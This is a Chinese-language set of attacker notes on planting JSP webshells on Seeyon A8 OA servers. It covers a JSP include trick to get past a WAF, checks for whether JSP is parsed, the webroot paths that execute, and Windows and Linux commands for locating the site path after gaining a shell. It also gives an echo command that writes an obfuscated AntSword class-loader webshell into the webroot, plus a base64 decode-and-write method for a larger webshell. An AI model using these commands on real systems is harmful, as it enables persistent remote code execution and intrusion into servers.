1. jsp本地包含文件: 可能需要利用包含过waf,
<%@ page contentType="text/html; charset=UTF-8" pageEncoding="UTF-8" %>
<%@include file="abc.js"%>
2. 测试是否支持解析jsp,显示源代码说明不解析,显示hello world说明解析
<% out.println("hello world"); %>
3. 解析路径可参考
D:\Seeyon\A8\ApacheJetspeed\webapps\Seeyon\shiro9000.jsp 不解析
要这个目录才解析 D:\Seeyon\A8\ApacheJetspeed\webapps\ROOT\shiro9000.jsp
4. windows下查找文件命令:
当注入或者其他获取到cmd,但是目标不出网的时候,站库不分离
where /R D:\wwwroot\ /T t_2810039303.jpg
建议用它:
dir /s /b D:\*.js | findstr /i /e "dojo.js"
找到网站的物理路径 echo webshell 蚂剑一句话zero
echo ^<%!class SBDZ extends ClassLoader{ SBDZ(ClassLoader ZQIM){ super(ZQIM); }public Class g(byte []b){ return super.defineClass(b,0,b.length); }}%^>^<% String cls=request.getParameter("zero");if(cls!=null){ new SBDZ(this.\u0067etClass().\u0067etClassLoader()).g(new sun.misc.\u0042\u0041\u0053\u0045\u00364\u0044\u0065co\u0064\u0065\u0072().decodeBuffer(cls)).newInstance().equals(pageContext); }%^> >> D:\Seeyon\A8\ApacheJetspeed\webapps\ROOT\shiro9000.jsp
5. linux下查找文件命令:
ls -m 会以分号隔开列出文件(find找不到的shell找网站路径有用 )
find / -type f -name "*.jsp" 查找主站特定文件名。
find / -type f -name "*.jsp" | xargs grep "ERROR" 查找主站特定文件名内容。
找到网站的物理路径 echo webshell
base64 可以是大马,多次echo就行
echo base64马内容 | base64 -d >> /app/yyadm/heihao.jsp
好像都是些常规路子